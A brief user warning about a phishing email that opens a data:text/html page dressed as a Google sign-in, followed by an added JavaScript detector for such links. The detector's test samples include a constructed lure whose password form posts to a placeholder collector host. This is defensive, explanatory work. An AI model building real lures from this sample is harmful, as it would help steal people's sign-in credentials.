Just had a dodgy-looking email but with a legitimate-looking Drive panel with the usual offering to download or save to Drive. I should know better but I clicked it!
Instead of asking where in Drive, it opened a new tab with a Google sign-in and a URL like:
It's easy to ignore the data:text/html and be comforted by the familiar Google URL; however, the rest of the URL can contain a form posting my username and password to the nasty people.
Be warned - they're getting cleverer!
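
One way a mail filter or browser extension could flag this kind of link, as an added example that is not part of the original post. The function names `inspectLink` and `isSuspicious` and all sample URLs are constructed for illustration.

```javascript
// Added example: classify a link target as a possible data:-URI sign-in lure.
// Function names and sample values are hypothetical, not from the original post.

function inspectLink(href) {
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(href.trim());
  if (!m) return { dataUri: false, mediaType: null, reasons: [] };

  // RFC 2397: data:[<mediatype>][;base64],<data>
  const meta = m[1].toLowerCase().split(';').map((s) => s.trim());
  const mediaType = meta[0] || 'text/plain';
  const isBase64 = meta.includes('base64');

  let body;
  try {
    body = isBase64
      ? Buffer.from(m[2], 'base64').toString('utf8')
      : decodeURIComponent(m[2]);
  } catch {
    body = m[2]; // malformed percent-encoding: inspect the raw text instead
  }

  const reasons = [];
  if (mediaType === 'text/html') reasons.push('html-document');
  // A familiar-looking web address at the start is only text inside the payload.
  if (/^\s*https?:\/\//i.test(body)) reasons.push('leading-lookalike-url');
  if (/<form\b/i.test(body)) reasons.push('form');
  if (/<input\b[^>]*type\s*=\s*["']?password/i.test(body)) reasons.push('password-field');
  if (/<script\b/i.test(body)) reasons.push('script');
  return { dataUri: true, mediaType, reasons };
}

// A data: URI that renders HTML with active or credential-collecting content.
function isSuspicious(href) {
  const r = inspectLink(href);
  return r.dataUri && r.reasons.includes('html-document') &&
    ['form', 'password-field', 'script'].some((x) => r.reasons.includes(x));
}

// Constructed samples (not real indicators).
const SAMPLE_LURE = 'data:text/html,https://accounts.example.com/signin ' +
  '<form action="https://collector.example.invalid/"><input type="password" name="p"></form>';
const SAMPLE_LURE_B64 = 'data:text/html;base64,' +
  Buffer.from('<form><input type=password></form>').toString('base64');
const SAMPLE_IMAGE = 'data:image/png;base64,iVBORw0KGgo=';
const SAMPLE_NORMAL = 'https://drive.example.com/file/d/EXAMPLE/view';

for (const s of [SAMPLE_LURE, SAMPLE_LURE_B64, SAMPLE_IMAGE, SAMPLE_NORMAL]) {
  console.log(isSuspicious(s), JSON.stringify(inspectLink(s).reasons));
}
```

The same rule applies when checking by eye: a genuine sign-in page's address starts with https:// followed by the provider's own host name, never with data:.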